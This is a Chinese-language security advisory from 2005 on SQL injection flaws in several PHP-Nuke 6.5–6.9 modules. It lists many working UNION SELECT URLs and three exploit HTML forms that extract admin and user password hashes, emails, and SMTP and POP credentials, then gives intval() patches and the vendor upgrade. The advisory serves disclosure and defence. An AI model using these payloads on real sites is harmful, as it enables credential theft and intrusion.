PHP-Nuke多个模块SQL注入漏洞
2005-08-17
系统编号:
WAVDB-00457
BUGTRAQ: 9544
影响版本:
PHP-Nuke 6.5-6.9
程序介绍:
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
漏洞分析:
PHP-Nuke多个模块对用户提交数据缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL攻击,获得管理员帐户等。
第一个漏洞存在与/modules/Web_Links/index.php文件中,此模块多个函数对$cid参数的调用值缺少充分过滤,提交包含恶意SQL命令的数据作为此参数值,可绕过原有SQL逻辑,获得数据库中敏感信息,如管理员加密后密码的信息。
另一个漏洞存在与/modules/Downloads/index.php文件中,其中多个函数对SQL请求中包含的可修改变量没有过滤。同样问题还存在于mainfile.php文件中,此文件对GET请求作了适当过滤,而对POST请求缺没有进行正确处理。
漏洞利用:
http://www.example.com/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20
SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL
ECT%20pwd,0%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION
%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors
如果link 0不存在,显示登录的管理员名和密码。
- http://www.example.com/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20
SELECT%20pwd%20FROM%20nuke_authors
Re-steer towards the encrypted password.
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20
UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*
显示所有登录管理员及加密信息。
- http://www.example.com/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1
%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
显示登录ID和所有成员的加密密码。
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20
UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*
- http://www.example.com/modules.php?name=Downloads&d_op=modifydownloadrequest&
lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,
user_email,user_level,0,0%20FROM%20nuke_users
显示登录ID和所有成员的加密密码,名称,EMAIL,级别等信息。
- http://www.example.com/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20
SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
- http://www.example.com/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20
SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownloadcomments&
lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20
FROM%20nuke_users/*
- http://www.example.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1
%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users
显示登录ID和所有成员的加密密码。
- http://www.example.com/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
%20SELECT%20pwd%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Sections&op=listarticles&secid=-1%20UNION
%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
- http://www.example.com/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20
SELECT%20aid,pwd%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20
SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors
- http://www.example.com/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20
SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_autho
rs/*
--------------------PHPNUKEexploit1.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method= POST action= http://[target]/modules.php?name=Sections >
<input type= hidden name= op value= printpage >
<input type= text name= artid value= -1 UNION SELECT
CONCAT(name,char(58),aid),pwd FROM nuke_authors >
<input type= submit >
</form>
<p align= right >A patch can be found on <a
href= http://www.phpsecure.info target= _blank >phpSecure.info</a>
For more informations about this exploit :
<a href= http://www.security-corporation.com/advisories-026.html
target= _blank > Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit1.html--------------------
--------------------PHPNUKEexploit2.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method= POST action= http://[target]/modules.php?name=Downloads >
<input type= hidden name= d_op value= viewdownloadeditorial >
<input type= text name= lid value= -1 UNION SELECT
config_name,0,config_value,0 FROM nuke_bbconfig where
config_name=char(115,109,116,112,95,104,111,115,116) OR
config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101) OR
config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100) >
<input type= submit >
</form>
<p align= right >A patch can be found on <a
href= http://www.phpsecure.info target= _blank >phpSecure.info</a>
For more informations about this exploit :
<a href= http://www.security-corporation.com/advisories-026.html
target= _blank > Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit2.html--------------------
--------------------PHPNUKEexploit3.html--------------------
<html>
<head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head>
<body>
<form method= POST action= http://[target]/modules.php?name=Downloads >
<input type= hidden name= d_op value= viewdownloadeditorial >
<input type= text name= lid value= -1 UNION SELECT
char(120),NOW(),char(32),CONCAT(char(60,98,114,62,76,111,103,105,110,32,58,3
2),uname,char(60,98,114,62,60,98,114,62,80,97,115,115,119,111,114,100,32,58,
32),passwd,char(60,98,114,62))
FROM nuke_popsettings >
<input type= submit >
</form>
<p align= right >A patch can be found on <a
href= http://www.phpsecure.info target= _blank >phpSecure.info</a>
For more informations about this exploit :
<a href= http://www.security-corporation.com/advisories-026.html
target= _blank > Security-Corporation.com</a></p>
</body>
</html>
--------------------PHPNUKEexploit3.html--------------------
解决方案:
如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
* 在/modules/Web_Links/index.php文件中 switch($l_op) { 前增加如下行:
------------------------------------------------------------------------
$cid = intval($cid);
$min = intval($min);
$lid = intval($lid);
$parentid = intval($parentid);
------------------------------------------------------------------------
在/modules/Downloads/index.php文件中 switch($d_op) { :
------------------------------------------------------------------------
$cid = intval($cid);
$min = intval($min);
$sid = intval($sid);
$lid = intval($lid);
$cat = intval($cat);
------------------------------------------------------------------------
在/modules/Reviews/index.php文件 switch($rop) { 前增加/modules/Reviews/index.php:
------------------------------------------------------------------------
$id = intval($id);
$cid = intval($cid);
------------------------------------------------------------------------
在/modules/Sections/index.php文件 switch($op) { 前增加:
------------------------------------------------------------------------
$artid = intval($artid);
$secid = intval($secid);
------------------------------------------------------------------------
在/modules/Stories_Archive/index.php文件 switch($sa) { 前增加:
------------------------------------------------------------------------
$min = intval($min);
------------------------------------------------------------------------
厂商补丁:
Francisco Burzi
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载PHP-Nuke 7.0:
http://www.phpnuke.org
信息来源:
<*来源:Security Corporation (advisory@security-corporation.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107577380625147&w=2
*>